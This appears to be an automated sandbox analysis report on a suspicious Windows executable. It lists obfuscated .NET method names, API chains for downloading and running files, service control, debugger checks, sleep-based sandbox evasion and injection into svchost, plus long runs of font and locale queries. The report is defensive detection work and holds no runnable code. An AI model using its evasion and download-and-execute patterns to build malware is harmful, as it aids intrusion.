Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.cs | High entropy of concatenated method names: 'KwAmenCN9k', 'fOGm8WAJKd', 'MZmmDC9WG5', 'LcKmkskJyH', 'R7VmKjcwk5', 'LTcmbNPqlJ', 'yq8mx46krj', 'XtVmVpSxIN', 'ynnmfEr0bW', 'muNm94rsEh'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, FmA2iaoKSyOClB00cR.cs | High entropy of concatenated method names: 'Dispose', 'GQ4IlnpuhZ', 'wWAT7WEhYe', 'vHZooMe5f5', 'YcwIcxAi8l', 'euJIzlilOl', 'ProcessDialogKey', 'NX9TA1YHpO', 'BRLTI7TFqy', 'rdiTTj5cl9'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, S8S0S3jqgBRL6UwDkdt.cs | High entropy of concatenated method names: 'edWCEcYMQU', 'PrxCWjCgLb', 'oYVCYDwxi5', 'u5OCMo78KM', 'NdFCpus2Ii', 'txmChquoMx', 'KrXCHJRWUO', 'Yw4C5Vbk9F', 'h9ZC6fKaiH', 'DbsC2hwQAn'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, Hb2FV72DDRoi9CPivd.cs | High entropy of concatenated method names: 'AixKplDluv', 'w8wKHDg0Le', 'xWJkJZrjnd', 'r2MkN3joCS', 'dULkwYytgc', 'DIrkGcqEx7', 'ID8kjGJAr8', 'hEZkOxe9iK', 'xf0kydlqjM', 'XlxknqTrFR'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, HU8MEIZHHa9c0pqIir.cs | High entropy of concatenated method names: 'QYybeAOcLX', 'VGDbDF9t1L', 'ILbbKtSAc4', 'mjHbxDxwfD', 'e91bVpaKLq', 'NVvKXifVXB', 'DDNK0ADRLd', 'McOKL0dYAj', 'yuwK4pyDuc', 'QYAKlDQjWS'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, T5g3cuESsMopB158wk.cs | High entropy of concatenated method names: 'QiAQ5IANfW', 'bBLQ6ELBQO', 'br0Q1TXKNO', 'WaBQ7QoPqQ', 'v9WQNCFA5C', 'XUTQwJT9xP', 'WAxQjIMiYg', 'rB5QOg2lQO', 'JtWQnhL9Rx', 'LA9QP4Bp6R'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, WZxX4vjFUp1Vg7W0p0b.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IGZZue0gJ2', 'ortZrIHMJK', 'gwZZqMcJut', 'MWlZSIeRFN', 'GJMZXWsuuN', 'igoZ0GCmty', 'fmWZLsF5HI'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, Y3GgxCR1JGw1AVHmps.cs | High entropy of concatenated method names: 'iU2U8j0fBp', 'Y3jUDX6pKD', 'IZhUk4LYPZ', 'DjrUKj7kYI', 'pI6UbikN4U', 'ICMUx31pdf', 'HwDUVcEJFh', 'mW2UfaGs6c', 'SyDU9s0o71', 'jN5UsswbSZ'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, CZCrAI4AjcRGd5YCvg.cs | High entropy of concatenated method names: 'QojxEqZ0yT', 'HjAxWvVlhL', 'ccvxYZ6hm2', 'tNsxMtWZTa', 'WqTxpTfTMP', 'LuJxhFJdfs', 'bJwxHXlghp', 'BWrx5aTXgf', 'bRox6adpCC', 'wCMx2hVkmj'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, nb3pEF8erS6YBTOUO8.cs | High entropy of concatenated method names: 'A0GFnkBGBG', 'sAdFvBEQqe', 'I5GFumo0xt', 'KfGFrJaERk', 'a25F7w6f6E', 'U2cFJ7C6UH', 'LnjFNyAOL0', 'DasFwpTOG7', 'iQgFGKliih', 'fCFFjXJkuL'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, tWn2UPi7xAXuAbxNPP.cs | High entropy of concatenated method names: 'MSot4C0jGZ', 'TgdtcCOJtB', 'ueRUAFflXA', 'vTIUI0n9PR', 'voitPfwbtJ', 'AhHtvCujvY', 'ykvtaPaXpS', 'mJwtu8hDw9', 'mMbtr8HOh1', 'tAjtqtSLix'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, rsjbrOx6pQ72IEhA1F.cs | High entropy of concatenated method names: 'SrtU1RUm5p', 'fYpU753KaD', 'LIDUJkFJGN', 'KX9UN5kL6B', 'QZUUuOUHfs', 'r7EUwHh3mf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, xEOAeNDTubN0HW45AU.cs | High entropy of concatenated method names: 'ToString', 'xZ9dPI4ri8', 'q5Ud7NUB7X', 'CaodJQLnBG', 'eDsdNcRA6f', 'lVpdwyTUIl', 'bD6dGNMXqc', 'Rg6dj16RPX', 'VM2dOxiJrS', 'jO3dygJEd3'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, rYVqfWU3FePsUOK5NV.cs | High entropy of concatenated method names: 'YK3IxVNC01', 'aaoIVrU7mf', 'wvvI9BnecT', 'csSIsZpZng', 'gfTIF8KwMn', 'oZTId5aGdM', 'aQPp6VbpWv0nnMRGBY', 'YtvPaU1buwL4ldCcN5', 'CxdII1HmEa', 'qhKImvHTXU'
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, kjNTPYL1gOM9ugW9Oh.cs | High entropy of concatenated method names: 'gvWx843bHh', 'HFhxk0QEoD', 'CUTxbfkgWT', 'oYYbcAfieJ', 'LeObzpm4oW', 'I54xATr7PE', 'mZ3xI5eBbp', 'lRfxTIPGWa', 'lKuxmdmch0', 'qJJxB0lHai'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, xMa3F2j7E8i4u6CtLL3.csHigh entropy of concatenated method names: 'HxRZEpy2rB', 'YMGZWwPFVF', 'SrxZYUBunV', 'eGshTmYb8uGjlfyLa9d', 'OCOpvsY1csFDgDWpIPN', 'O57d7PYE16SUiQKkKKn'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, d68QmCbgVnawm6LGVN.csHigh entropy of concatenated method names: 'JTUDu7gqU4', 'FwGDr06LG0', 'EHbDq6VjxL', 'NrmDSVZjoM', 'IS0DXhMphj', 'XbLD0g43vi', 'qAyDLhxoTH', 'SU3D4MISZ2', 'jg1DlnU8kk', 'zSYDcM3MsJ'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, yocuev7bZEAwKZtXyr.csHigh entropy of concatenated method names: 'IxiY4i8qv', 'dnOM0IV9X', 'EaLhhR1Sy', 'CS5HbxkFh', 'xy76s39gx', 'uEN2WwlEk', 'etZJA5lcNhDjNUpUqP', 'qmbEom5uQR5UlxE8QA', 'RDbUSxxH2', 'MbPZyWvMx'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, ncgxWpVdyYVxS9q32n.csHigh entropy of concatenated method names: 'H9tkMrBrfb', 'HDFkhZGOV1', 'pBwk5jKDPH', 'Dp7k64A7AF', 'rvpkF6D2WV', 'v8QkdKAc3R', 'sHdkt5fF1A', 'VyFkUVJ9Ev', 'L0ykCyv63K', 'ICSkZ1wGr4'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, QyaYlnzfG1oLNxy13k.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BQsCQGyLMe', 'wpgCFBRvNp', 'mZDCd6M3hV', 'Am8Ctaam2v', 'fEICU6SyOZ', 'JRSCCqOgk9', 'w92CZijvCR'
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, n7fBrTOnjSVsbZtnSb.csHigh entropy of concatenated method names: 'wgcCIbAt2o', 'vcmCmqU232', 'FKVCBav4En', 'vKjC8dp9ws', 'ueoCDwrKWy', 'hY4CKQarEh', 'QS0CbXQZvq', 'r0oUL7VduL', 'wg7U4D0UDj', 'GH5UlTMY1p'
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00406EEB ShellExecuteW,URLDownloadToFileW,3_2_00406EEB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AADB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CBE1
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040F7E2 Sleep,ExitProcess,3_2_0040F7E2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 26C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 2780000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 26C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 75F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 85F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 87A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 97A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: 9EC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: AEC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: BEC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0041A7D9
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Window / User API: threadDelayed 3191
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Window / User API: threadDelayed 6756
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 5480 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180 | Thread sleep count: 3191 > 30
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180 | Thread sleep time: -9573000s >= -30000s
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180 | Thread sleep count: 6756 > 30
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe TID: 4180 | Thread sleep time: -20268000s >= -30000s
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0040928E
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C322
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C388
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_004096A0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_00408847
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00407877 FindFirstFileW,FindNextFileW,3_2_00407877
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB6B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419B86
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD72
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407CD2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Thread delayed: delay time: 922337203685477
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.000000000120A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.000000000120A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | API call chain: ExitProcess graph end node graph_3-48218
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00434A8A
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CBE1
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00443355 mov eax, dword ptr fs:[00000030h] 3_2_00443355
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004120B2 GetProcessHeap,HeapFree,3_2_004120B2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0043503C
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00434A8A
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043BB71
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00434BD8 SetUnhandledExceptionFilter,3_2_00434BD8
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 3_2_00412132
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00419662 mouse_event,3_2_00419662
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00434CB6 cpuid 3_2_00434CB6
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetLocaleInfoA,3_2_0040F90C
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: EnumSystemLocalesW,3_2_0045201B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: EnumSystemLocalesW,3_2_004520B6
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00452143
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetLocaleInfoW,3_2_00452393
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: EnumSystemLocalesW,3_2_00448484
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004524BC
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetLocaleInfoW,3_2_004525C3
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452690
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: GetLocaleInfoW,3_2_0044896D
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451D58
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: EnumSystemLocalesW,3_2_00451FD0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
